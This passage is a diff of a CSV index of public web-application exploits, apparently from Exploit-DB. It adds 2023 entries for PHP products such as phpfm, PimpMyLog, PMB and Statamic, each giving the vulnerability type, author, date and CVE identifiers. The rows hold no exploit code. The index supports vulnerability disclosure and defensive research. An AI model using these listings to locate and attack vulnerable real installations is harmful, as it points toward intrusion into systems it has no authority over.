Injection",2020-03-23,qw3rTyTy,webapps,php,,2020-03-23,2020-03-23,0,,,,,, 44447,exploits/php/webapps/44447.txt,"Joomla! Convert Forms version 2.0.3 - Formula Injection (CSV Injection)",2018-04-12,"Sairam Jetty",webapps,php,,2018-04-12,2018-04-16,0,CVE-2018-10063,,,,, 
@@ -24758,6 +24769,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,, 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,, 32932,exploits/php/webapps/32932.txt,"Online Photo Pro 2.0 - 'section' Cross-Site Scripting",2009-04-20,Vrs-hCk,webapps,php,,2009-04-20,2014-04-18,1,CVE-2009-4934;OSVDB-53807,,,,,https://www.securityfocus.com/bid/34625/info +51598,exploits/php/webapps/51598.sh,"Online Piggery Management System v1.0 - unauthenticated file upload vulnerability",2023-07-19,1337kid,webapps,php,,2023-07-19,2023-07-19,0,CVE-2023-37629,,,,, 51431,exploits/php/webapps/51431.py,"Online Pizza Ordering System v1.0 - Unauthenticated File Upload",2023-05-05,URGAN,webapps,php,,2023-05-05,2023-05-09,1,CVE-2023-2246,,,,, 48671,exploits/php/webapps/48671.txt,"Online Polling System 1.0 - Authentication Bypass",2020-07-15,AppleBois,webapps,php,,2020-07-15,2020-07-15,0,,,,,, 50560,exploits/php/webapps/50560.txt,"Online Pre-owned/Used Car Showroom Management System 1.0 - SQLi Authentication Bypass",2021-12-03,"Mohamed habib Smidi",webapps,php,,2021-12-03,2021-12-16,0,CVE-2021-44655,,,,, 
@@ -26837,6 +26849,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31844,exploits/php/webapps/31844.txt,"PHPFix 2.0 - '/fix/browse.php?kind' SQL Injection",2008-05-26,Unohope,webapps,php,,2008-05-26,2014-02-23,1,CVE-2008-2479;OSVDB-45643,,,,,https://www.securityfocus.com/bid/29371/info 8975,exploits/php/webapps/8975.txt,"PHPFK 7.03 - 'page_bottom.php' Local File Inclusion",2009-06-17,ahmadbady,webapps,php,,2009-06-16,,1,OSVDB-55195;CVE-2009-2112,,,,, 26474,exploits/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,webapps,php,,2005-11-07,2013-06-29,1,CVE-2005-4423;OSVDB-22799,,,,,https://www.securityfocus.com/bid/15335/info +51594,exploits/php/webapps/51594.py,"phpfm v1.7.9 - Authentication type juggling",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,, 17485,exploits/php/webapps/17485.txt,"PhpFood CMS 2.00 - SQL Injection",2011-07-04,kaMtiEz,webapps,php,,2011-07-04,2011-07-04,1,,,,,, 3226,exploits/php/webapps/3226.txt,"PHPFootball 1.6 - Remote Database Disclosure",2007-01-30,ajann,webapps,php,,2007-01-29,2016-12-14,1,OSVDB-33070;CVE-2007-0638,,,,http://www.exploit-db.comPHPfootball1.6.zip, 7636,exploits/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,webapps,php,,2008-12-31,2016-12-21,1,OSVDB-51105;CVE-2009-0711;OSVDB-51104;CVE-2009-0710;OSVDB-51103;OSVDB-51102;CVE-2009-0709,,,,http://www.exploit-db.comPHPfootball1.6.zip, 
@@ -27574,6 +27587,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz, 45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80,2018-08-16,2018-08-16,0,CVE-2018-14059;CVE-2018-14058;CVE-2018-14057,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.compimcore-5.2.3.tar.gz, 51201,exploits/php/webapps/51201.txt,"pimCore v5.4.18-skeleton - Sensitive Cookie with Improper SameSite Attribute",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,, +51593,exploits/php/webapps/51593.py,"PimpMyLog v1.7.14 - Improper access control",2023-07-19,thoughtfault,webapps,php,,2023-07-19,2023-07-19,0,,,,,, 31734,exploits/php/webapps/31734.txt,"Pina CMS - Multiple Vulnerabilities",2014-02-18,"Shadman Tanjim",webapps,php,80,2014-02-18,2014-03-15,0,OSVDB-103445;OSVDB-103444,,,,http://www.exploit-db.compinacms-master.zip, 4519,exploits/php/webapps/4519.txt,"Pindorama 0.1 - 'client.php' Remote File Inclusion",2007-10-11,S.W.A.T.,webapps,php,,2007-10-10,2016-10-20,1,OSVDB-37879;CVE-2007-5387,,,,http://www.exploit-db.compindorama-0.1.zip, 48323,exploits/php/webapps/48323.txt,"Pinger 1.0 - Remote Code Execution",2020-04-15,"Milad karimi",webapps,php,,2020-04-15,2020-04-15,0,,,,,, 
@@ -27777,6 +27791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 35625,exploits/php/webapps/35625.txt,"PMB 4.1.3 - (Authenticated) SQL Injection",2014-12-27,"xd4rker dark",webapps,php,,2014-12-27,2014-12-27,0,OSVDB-116480;CVE-2014-9457,,,,, 49054,exploits/php/webapps/49054.txt,"PMB 5.6 - 'chemin' Local File Disclosure",2020-11-16,41-trk,webapps,php,,2020-11-16,2020-11-16,0,,,,,, 48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php,,2020-04-21,2020-04-21,0,,,,,, +51197,exploits/php/webapps/51197.txt,"PMB 7.4.6 - SQL Injection",2023-04-01,"str0xo DZ",webapps,php,,2023-04-01,2023-07-19,0,,,,,, 3443,exploits/php/webapps/3443.txt,"PMB Services 3.0.13 - Multiple Remote File Inclusions",2007-03-09,K-159,webapps,php,,2007-03-08,,1,OSVDB-35125;CVE-2007-1415;OSVDB-35124;OSVDB-35123;OSVDB-35122;OSVDB-35121;OSVDB-35120;OSVDB-35119;OSVDB-35118;OSVDB-35117;OSVDB-35116;OSVDB-35115;OSVDB-35114;OSVDB-35113;OSVDB-35112;OSVDB-35111;OSVDB-35110;OSVDB-35109;OSVDB-35108;OSVDB-35107;OSVDB-35106;OSVDB-35105;OSVDB-35104;OSVDB-35103;OSVDB-35102;OSVDB-35101,,,,,http://advisories.echo.or.id/adv/adv68-K-159-2007.txt 16087,exploits/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,webapps,php,,2011-02-01,2011-02-01,1,OSVDB-70752,,,,, 3852,exploits/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,webapps,php,,2007-05-03,,1,OSVDB-35781;CVE-2007-2540;OSVDB-35780;OSVDB-35779;OSVDB-35778;OSVDB-35777,,,,, 
@@ -30090,6 +30105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6406,exploits/php/webapps/6406.txt,"Stash 1.0.3 - Insecure Cookie Handling",2008-09-09,Ciph3r,webapps,php,,2008-09-08,2016-12-23,1,OSVDB-48219;CVE-2008-4081,,,,http://www.exploit-db.comstash-1.0.3.tar.gz, 6402,exploits/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injections",2008-09-09,"Khashayar Fereidani",webapps,php,,2008-09-08,2016-12-23,1,OSVDB-47995;CVE-2008-4080;OSVDB-47994,,,,http://www.exploit-db.comstash-1.0.3.tar.gz, 6714,exploits/php/webapps/6714.pl,"Stash 1.0.3 - SQL Injection User Credentials Disclosure",2008-10-09,gnix,webapps,php,,2008-10-08,2016-12-23,1,OSVDB-49170;CVE-2008-4590;OSVDB-49169,,,,http://www.exploit-db.comstash-1.0.3.tar.gz, +51602,exploits/php/webapps/51602.txt,"Statamic 4.7.0 - File-Inclusion",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,0,,,,,, 11434,exploits/php/webapps/11434.txt,"statcountex 3.1 - Multiple Vulnerabilities",2010-02-13,Phenom,webapps,php,,2010-02-12,,1,OSVDB-62531;CVE-2010-0674;CVE-2008-0843,,,,http://www.exploit-db.comstatcountex-3.1.zip, 36499,exploits/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,webapps,php,,2012-01-04,2015-03-26,1,CVE-2012-5341;OSVDB-86238,,,,,https://www.securityfocus.com/bid/51280/info 1752,exploits/php/webapps/1752.pl,"StatIt 4 - 'statitpath' Remote File Inclusion",2006-05-05,IGNOR3,webapps,php,,2006-05-04,,1,OSVDB-25448;CVE-2006-2253,,,,, 
@@ -31315,6 +31331,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 6221,exploits/php/webapps/6221.txt,"Vacation Rental Script 3.0 - 'id' SQL Injection",2008-08-10,CraCkEr,webapps,php,,2008-08-09,2016-12-15,1,OSVDB-47372;CVE-2008-3603,,,,, 15793,exploits/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload",2010-12-20,Br0ly,webapps,php,,2010-12-20,2010-12-20,1,OSVDB-70019,,,,, 15828,exploits/php/webapps/15828.txt,"Vacation Rental Script 4.0 - Cross-Site Request Forgery",2010-12-25,OnurTURKESHAN,webapps,php,,2010-12-25,2010-12-26,0,,,,,http://www.exploit-db.comvacationrentalscript40.zip, +51596,exploits/php/webapps/51596.txt,"Vaidya-Mitra 1.0 - Multiple SQLi",2023-07-19,nu11secur1ty,webapps,php,,2023-07-19,2023-07-19,1,,,,,, 34535,exploits/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 - Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42767/info 25301,exploits/php/webapps/25301.txt,"Valdersoft Shopping Cart 3.0 - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,,,,,,https://www.securityfocus.com/bid/12916/info 2964,exploits/php/webapps/2964.txt,"Valdersoft Shopping Cart 3.0 - Multiple Remote File Inclusions",2006-12-20,mdx,webapps,php,,2006-12-19,,1,OSVDB-32389;CVE-2006-6691,,,,,